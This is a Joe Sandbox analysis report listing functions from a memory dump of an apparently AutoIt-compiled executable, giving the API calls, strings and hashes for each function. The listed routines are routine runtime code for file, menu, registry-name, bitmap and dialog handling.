                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 984253442-2268648507
                                                                  • Opcode ID: b7b9fc8a40293c77a794f14263aa51a73b574da471d9833c4bf8bb964c031cbd
                                                                  • Instruction ID: 790a1e61c4787c2fa681d73ff88aa7c08d3e194a8894797ac5f709817b85e66a
                                                                  • Opcode Fuzzy Hash: b7b9fc8a40293c77a794f14263aa51a73b574da471d9833c4bf8bb964c031cbd
                                                                  • Instruction Fuzzy Hash: 6F415B7290410DAADB04FBE4DD96EFE7778EF54300F500065B605B2091EA356F49CB62
                                                                  Function 0097BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00979207,?,?), ref: 0097BA56
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA6D
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA78
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA85
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0097BA8E
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA9D
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0097BAA6
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BAAD
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BABE
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00982CAC,?), ref: 0097BAD7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0097BAE7
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0097BB0B
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0097BB36
                                                                  • DeleteObject.GDI32(00000000), ref: 0097BB5E
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0097BB74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 022997ebf65a0600b689af94d6c681458d9c2cde6c74b24a6dd3423c0fac722c
                                                                  • Instruction ID: 4447810d1bc703ba1f0cac6db9c6ccccc2cf8dd945b77b2d61e25b6ef77e1708
                                                                  • Opcode Fuzzy Hash: 022997ebf65a0600b689af94d6c681458d9c2cde6c74b24a6dd3423c0fac722c
                                                                  • Instruction Fuzzy Hash: B3413976604208EFDB119F65DC98EAABBBCFF89B15F108068F909E7260D7309D41DB60
                                                                  Function 0095D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 0095DA10
                                                                  • _wcscat.LIBCMT ref: 0095DA28
                                                                  • _wcscat.LIBCMT ref: 0095DA3A
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0095DA4F
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DA63
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0095DA7B
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 0095DA95
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DAA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: 53dd1799be9582c97d045cb597dbd636cccbc25e0814ed46f8da6da79060d595
                                                                  • Instruction ID: ecdd74c58de0d89212a61de57dff3855cf002047ff2e3086155c89566be1eb2d
                                                                  • Opcode Fuzzy Hash: 53dd1799be9582c97d045cb597dbd636cccbc25e0814ed46f8da6da79060d595
                                                                  • Instruction Fuzzy Hash: 118191725062459FCB34EF66C854AAAB7E8BF89311F144C2EFC89C7251E634D948CB52
                                                                  Function 0097C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0097C1FC
                                                                  • GetFocus.USER32 ref: 0097C20C
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0097C217
                                                                  • _memset.LIBCMT ref: 0097C342
                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0097C36D
                                                                  • GetMenuItemCount.USER32(?), ref: 0097C38D
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0097C3A0
                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0097C3D4
                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0097C41C
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0097C454
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0097C489
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: cf07a1dcb64f2b6ff4bc8ddb9cfb99b83d8914cd90968362aecc5694dffb2807
                                                                  • Instruction ID: 01005d19ca77054631d5fd312a2c22f5224d79e0bfa80759f69977717fb3d8cd
                                                                  • Opcode Fuzzy Hash: cf07a1dcb64f2b6ff4bc8ddb9cfb99b83d8914cd90968362aecc5694dffb2807
                                                                  • Instruction Fuzzy Hash: 4C8191B22083059FD710DF24C894A7BBBE8FF88714F00892DF999A72A1D770D945DB52
                                                                  Function 0096731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0096738F
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0096739B
                                                                  • CreateCompatibleDC.GDI32(?), ref: 009673A7
                                                                  • SelectObject.GDI32(00000000,?), ref: 009673B4
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00967408
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00967444
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00967468
                                                                  • SelectObject.GDI32(00000006,?), ref: 00967470
                                                                  • DeleteObject.GDI32(?), ref: 00967479
                                                                  • DeleteDC.GDI32(00000006), ref: 00967480
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0096748B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: e6907e862b9bdab3e152ba430c9b2193db145e583a07aeeb642a474f231d5cf5
                                                                  • Instruction ID: e2ed82b11ce6ba8e00161e0919e75139e8c3ad5ef716e2f801b92cffcd668fab
                                                                  • Opcode Fuzzy Hash: e6907e862b9bdab3e152ba430c9b2193db145e583a07aeeb642a474f231d5cf5
                                                                  • Instruction Fuzzy Hash: 53514876A04309EFCB14CFA9DC84EAEBBB9EF48710F14842AF959A7310C771A940DB50
                                                                  Function 008F6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00910957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008F6B0C,?,00008000), ref: 00910973
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F6BAD
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008F6CFA
                                                                    • Part of subcall function 008F586D: _wcscpy.LIBCMT ref: 008F58A5
                                                                    • Part of subcall function 0091363D: _iswctype.LIBCMT ref: 00913645
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 537147316-1018226102
                                                                  • Opcode ID: 4eac46bab49afd217c37243bca34ed9b311be892977cd69dddd57aa623915bab
                                                                  • Instruction ID: 334554a6fd1c4bda2ad242930d325767ef6c394e731cb1619778c2a3befaf596
                                                                  • Opcode Fuzzy Hash: 4eac46bab49afd217c37243bca34ed9b311be892977cd69dddd57aa623915bab
                                                                  • Instruction Fuzzy Hash: ED02AB301083499FC714EF24D891AAFBBE5FF99314F10492DF68A972A1EB31D949CB52
                                                                  Function 00952D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952D50
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00952DDD
                                                                  • GetMenuItemCount.USER32(009B5890), ref: 00952E66
                                                                  • DeleteMenu.USER32(009B5890,00000005,00000000,000000F5,?,?), ref: 00952EF6
                                                                  • DeleteMenu.USER32(009B5890,00000004,00000000), ref: 00952EFE
                                                                  • DeleteMenu.USER32(009B5890,00000006,00000000), ref: 00952F06
                                                                  • DeleteMenu.USER32(009B5890,00000003,00000000), ref: 00952F0E
                                                                  • GetMenuItemCount.USER32(009B5890), ref: 00952F16
                                                                  • SetMenuItemInfoW.USER32(009B5890,00000004,00000000,00000030), ref: 00952F4C
                                                                  • GetCursorPos.USER32(?), ref: 00952F56
                                                                  • SetForegroundWindow.USER32(00000000), ref: 00952F5F
                                                                  • TrackPopupMenuEx.USER32(009B5890,00000000,?,00000000,00000000,00000000), ref: 00952F72
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00952F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: ff975ee340a32e69b0cec0b1753967d98e9d30e6e905b86f1ef1ad7c9ce14690
                                                                  • Instruction ID: 0db92b52c21536a78b9eb8a89516f91b3327f7e25c270d87cde1e23ee101dd56
                                                                  • Opcode Fuzzy Hash: ff975ee340a32e69b0cec0b1753967d98e9d30e6e905b86f1ef1ad7c9ce14690
                                                                  • Instruction Fuzzy Hash: 7271F671605205BFEB21CF56DC86FAABF68FF46325F100216FA29AA1E0C7715C58DB90
                                                                  Function 009477DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • _memset.LIBCMT ref: 0094786B
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009478A0
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009478BC
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009478D8
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00947902
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0094792A
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00947935
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094793A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1411258926-22481851
                                                                  • Opcode ID: 8117e3638e67010f0db4ea9cc2b791e1a8a00b71ab64e77e7d8b55841ed93028
                                                                  • Instruction ID: 8ae8d3dc194cde19491f3dcb24e14ff83b3be5f2a37d9487a2cf7bba1b1c7630
                                                                  • Opcode Fuzzy Hash: 8117e3638e67010f0db4ea9cc2b791e1a8a00b71ab64e77e7d8b55841ed93028
                                                                  • Instruction Fuzzy Hash: 0041F57281462DAADF15EBA8DC95DFDB778FF18310F404469E905A6261EB305E04CB91
                                                                  Function 00970E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-909552448
                                                                  • Opcode ID: f8695241aedfdb82877b61edc4d0e849826c1eec0ea7a28944a621496109e394
                                                                  • Instruction ID: 8531f7f161e5ae30cee538f2dc5a13c264be97a944293a118a1a1928eb6cf4d6
                                                                  • Opcode Fuzzy Hash: f8695241aedfdb82877b61edc4d0e849826c1eec0ea7a28944a621496109e394
                                                                  • Instruction Fuzzy Hash: BC41AE3221030ACBCF20EF64D956AEE3BA4FF96300F108414FC595B291DB75999ACBA0
                                                                  Function 0094F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0092E2A0,00000010,?,Bad directive syntax error,0097F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0094F7C2
                                                                  • LoadStringW.USER32(00000000,?,0092E2A0,00000010), ref: 0094F7C9
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • _wprintf.LIBCMT ref: 0094F7FC
                                                                  • __swprintf.LIBCMT ref: 0094F81E
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0094F88D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 1506413516-4153970271
                                                                  • Opcode ID: afd4ad189e3d9ec1c15d96bf21fed66c86f2e40c0e7007eb45f5cc2432554f6a
                                                                  • Instruction ID: 2ceccd8bca8e285fbf1e2bacf93310a4bbb01f815466bd91cf0fcd9721e478f4
                                                                  • Opcode Fuzzy Hash: afd4ad189e3d9ec1c15d96bf21fed66c86f2e40c0e7007eb45f5cc2432554f6a
                                                                  • Instruction Fuzzy Hash: 5C215C3290421EEFDF11AFA0CC1AEFE7739FF18304F044465F615A61A1EA71A658DB51
                                                                  Function 009552C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                    • Part of subcall function 008F7924: _memmove.LIBCMT ref: 008F79AD
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00955330
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00955346
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00955357
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00955369
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0095537A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_memmove
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 2279737902-1007645807
                                                                  • Opcode ID: 188a482dae842020a9d777e88f4e9c7b04d444f24efc75d7e6a0820b0f13bea6
                                                                  • Instruction ID: 9c179991e93f4749c3223b10744a8f58fbb8f7a0d59e669043e15ceee3ef8340
                                                                  • Opcode Fuzzy Hash: 188a482dae842020a9d777e88f4e9c7b04d444f24efc75d7e6a0820b0f13bea6
                                                                  • Instruction Fuzzy Hash: 9E116021A5012DB9E724F676CC5ADFFAB7CFBD6B44F000429B905E20E1EEA00D44C6A1
                                                                  Function 009546B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 208665112-3771769585
                                                                  • Opcode ID: a94565e9b18710faf76cc64ea496a6a4d5d66239618bf5a188f799ee073ee58e
                                                                  • Instruction ID: 1169a5949e81f29d5347c5bc702441d3ac4822951f923cedc3fac21600ec2ebd
                                                                  • Opcode Fuzzy Hash: a94565e9b18710faf76cc64ea496a6a4d5d66239618bf5a188f799ee073ee58e
                                                                  • Instruction Fuzzy Hash: 8F1105326041086BCB54EB31EC4AEDA77BCEB86716F0401BAF849A6091EF7189C58B51
                                                                  Function 00954F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00954F7A
                                                                    • Part of subcall function 0091049F: timeGetTime.WINMM(?,75A4B400,00900E7B), ref: 009104A3
                                                                  • Sleep.KERNEL32(0000000A), ref: 00954FA6
                                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00954FCA
                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00954FEC
                                                                  • SetActiveWindow.USER32 ref: 0095500B
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00955019
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00955038
                                                                  • Sleep.KERNEL32(000000FA), ref: 00955043
                                                                  • IsWindow.USER32 ref: 0095504F
                                                                  • EndDialog.USER32(00000000), ref: 00955060
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
